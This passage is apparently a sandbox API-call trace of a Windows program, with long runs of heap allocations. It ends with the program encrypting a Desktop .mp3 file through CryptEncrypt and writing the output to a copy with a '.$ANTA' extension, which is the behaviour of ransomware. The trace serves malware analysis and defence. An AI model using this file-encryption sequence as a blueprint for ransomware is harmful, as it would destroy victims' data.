RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0123.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0123.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0123.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0123.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0123.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0123.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0123.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0123.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796e48 [0123.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0123.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0123.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0123.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0123.155] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0123.155] CryptDestroyHash (hHash=0x41ac180) returned 1 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea268 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0123.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0123.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0123.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0123.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0123.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0123.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0123.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0123.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0123.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0123.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0123.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0123.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0123.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0123.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0123.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0123.313] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0123.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0123.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0123.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0123.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0123.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0123.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0123.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0123.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0123.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0123.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0123.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0123.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0123.315] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\I4IMK8uPkmw_W.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\i4imk8upkmw_w.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0123.316] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.316] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0123.316] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0123.316] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\I4IMK8uPkmw_W.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\i4imk8upkmw_w.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0123.319] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0123.319] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x7f8f, lpOverlapped=0x0) returned 1 [0123.320] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0123.323] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0123.323] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0123.323] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0123.323] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.323] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ec8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0123.323] CryptGetKeyParam (in: hKey=0x41ac200, dwParam=0x7, pbData=0x43e2920, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2920*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0123.381] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0123.381] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.381] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0123.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cacd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0123.382] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x7f8f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x7f90) returned 1 [0123.382] CharLowerBuffW (in: lpsz="byte[32657]", cchLength=0xb | out: lpsz="byte[32657]") returned 0xb [0123.382] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cadc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0123.382] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49c1ed8*, pdwDataLen=0x144e790*=0x7f8f, dwBufLen=0x7f90 | out: pbData=0x49c1ed8*, pdwDataLen=0x144e790*=0x7f90) returned 1 [0123.382] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0123.382] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0123.382] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.383] WriteFile (in: hFile=0x258, lpBuffer=0x49e9ce0*, nNumberOfBytesToWrite=0x7f90, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49e9ce0*, lpNumberOfBytesWritten=0x144f194*=0x7f90, lpOverlapped=0x0) returned 1 [0123.384] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0123.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.384] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca940, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0123.385] CryptDestroyKey (hKey=0x41ac200) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0123.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0123.385] HeapFree (in: 